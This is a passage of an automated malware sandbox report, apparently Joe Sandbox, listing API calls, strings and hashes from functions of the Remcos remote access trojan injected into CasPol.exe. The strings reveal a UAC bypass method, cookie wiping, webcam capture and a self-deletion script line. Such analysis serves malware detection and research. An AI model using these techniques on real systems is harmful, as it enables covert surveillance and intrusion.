                            • API String ID: 2936374016-2723203690
                            • Opcode ID: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                            • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                            • Opcode Fuzzy Hash: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                            • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                            Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Enum$InfoQueryValue
                            • String ID: [regsplt]$xUG$TG
                            • API String ID: 3554306468-1165877943
                            • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                            • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                            • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                            • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                            Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                            • __fassign.LIBCMT ref: 0044B479
                            • __fassign.LIBCMT ref: 0044B494
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                            • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                            • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                            • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                            • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                            Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: D[E$D[E
                            • API String ID: 269201875-3695742444
                            • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                            • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                            • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                            • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                            Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                              • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                              • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumInfoOpenQuerysend
                            • String ID: xUG$NG$NG$TG
                            • API String ID: 3114080316-2811732169
                            • Opcode ID: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
                            • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                            • Opcode Fuzzy Hash: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
                            • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                            Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                              • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                              • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                            • _wcslen.LIBCMT ref: 0041B763
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                            • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                            • API String ID: 37874593-122982132
                            • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                            • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                            • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                            • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                            Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                              • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                              • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                            • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            • API String ID: 1133728706-4073444585
                            • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                            • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                            • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                            • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                            Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                            • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                            • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                            • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                            Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                            • CloseHandle.KERNEL32(00000000), ref: 0041C459
                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                            • CloseHandle.KERNEL32(00000000), ref: 0041C477
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreatePointerWrite
                            • String ID: hpF
                            • API String ID: 1852769593-151379673
                            • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                            • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                            • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                            • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                            Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                            • _free.LIBCMT ref: 00450F48
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00450F53
                            • _free.LIBCMT ref: 00450F5E
                            • _free.LIBCMT ref: 00450FB2
                            • _free.LIBCMT ref: 00450FBD
                            • _free.LIBCMT ref: 00450FC8
                            • _free.LIBCMT ref: 00450FD3
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                            • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                            • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                            • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                            Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                            • int.LIBCPMT ref: 00411183
                              • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                              • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                            • std::_Facet_Register.LIBCPMT ref: 004111C3
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID: (mG
                            • API String ID: 2536120697-4059303827
                            • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                            • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                            • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                            • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                            Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                            • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                            • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                            • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                            • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                            Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 004075D0
                              • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                              • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                            • CoUninitialize.OLE32 ref: 00407629
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: InitializeObjectUninitialize_wcslen
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                            • API String ID: 3851391207-2637227304
                            • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                            • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                            • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                            • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                            Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                            • GetLastError.KERNEL32 ref: 0040BAE7
                            Strings
                            • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                            • UserProfile, xrefs: 0040BAAD
                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                            • [Chrome Cookies not found], xrefs: 0040BB01
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                            • API String ID: 2018770650-304995407
                            • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                            • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                            • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                            • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                            Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                            Download Yara Rule
                            APIs
                            • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                            • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AllocOutputShowWindow
                            • String ID: Remcos v$5.1.0 Pro$CONOUT$
                            • API String ID: 2425139147-1043272453
                            • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                            • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                            • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                            • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                            Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            • __allrem.LIBCMT ref: 0043AC69
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                            • __allrem.LIBCMT ref: 0043AC9C
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                            • __allrem.LIBCMT ref: 0043ACD1
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1992179935-0
                            • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                            • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                            • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                            • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                            Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                              • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologSleep
                            • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                            • API String ID: 3469354165-3054508432
                            • Opcode ID: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
                            • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                            • Opcode Fuzzy Hash: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
                            • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                            Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                            • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                            • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                            • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                              • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                              • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                              • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                            • String ID:
                            • API String ID: 3950776272-0
                            • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                            • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                            • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                            • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                            Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe
                            • String ID:
                            • API String ID: 4189289331-0
                            • Opcode ID: 0b5e7e778a45d4ef5640b8f49a3a6f21ebcbf364a7a7050dd0a353773097b25c
                            • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                            • Opcode Fuzzy Hash: 0b5e7e778a45d4ef5640b8f49a3a6f21ebcbf364a7a7050dd0a353773097b25c
                            • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                            Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                            • String ID:
                            • API String ID: 493672254-0
                            • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                            • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                            • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                            • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                            Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                            • _free.LIBCMT ref: 0044824C
                            • _free.LIBCMT ref: 00448274
                            • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                            • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                            • _abort.LIBCMT ref: 00448293
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                            • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                            • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                            • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                            Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                            Download Yara Rule
                            APIs
